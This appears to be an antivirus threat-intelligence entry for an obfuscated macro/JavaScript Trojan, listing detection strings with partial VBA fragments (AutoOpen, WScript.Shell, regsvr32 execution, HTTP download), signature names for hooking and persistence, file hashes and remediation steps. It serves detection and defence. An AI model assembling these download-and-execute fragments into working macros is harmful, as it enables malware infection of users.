Concrete signature match: Trojan - Appears legitimate but performs malicious actions for JavaScript platform, family Obfuse
This is an obfuscated JavaScript Trojan detected via concrete behavioral analysis. It typically originates from a macro-enabled document, downloads additional malicious payloads, establishes persistence by modifying system files and templates, and silently executes commands using Windows utilities like WScript.Shell, mshta.exe, and regsvr32.
Relevant strings associated with this threat:
- .VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoOpen" (MACROHSTR_EXT)
- .SaveAs (GetPath$ + "NORMAL1.DOT") (MACROHSTR_EXT)
- + "cript.shell") (MACROHSTR_EXT)
- String = "c:\programdata\ (MACROHSTR_EXT)
- (0) + "vr32 c:\programdata\ (MACROHSTR_EXT)
- .txt", "ws" (MACROHSTR_EXT)
- .pdf", "ws" (MACROHSTR_EXT)
- .Open "GET (MACROHSTR_EXT)
- .responsebody (MACROHSTR_EXT)
- = CreateObject("WScript.Shell") (MACROHSTR_EXT)
- = CreateObject("Scripting.FileSystemObject") (MACROHSTR_EXT)
- (Environ("USERPROFILE") + "\Documents\" + "qX2xpJ5V.txt") Then (MACROHSTR_EXT)
- mp4klgzo.CreateFolder (pacbhdvc) (MACROHSTR_EXT)
- = q87fpor4.Run("wscript.exe //b " + Chr(34) + qs + Chr(34), 4, False) (MACROHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)743ee294d9419a39cb0d15ad32ced4d3d78886eb98e34a39bfea2856b51b829522c82e599efee60dfcc61674e315922cafe2a44fce11f67bbc97754bcb664ee93a3a7bf17331c8f6faa3b0dfb109cda4154f0a999f0b27a293e29439c10a94eed320aba8582e9d6f494bc7f49b954e904fac0b71bd499e801c7d9f7524ffda53Isolate the affected host immediately. Perform a full system scan to ensure all malicious components are removed. Review system logs for persistence mechanisms and block any identified command-and-control (C2) domains or IPs at the network perimeter.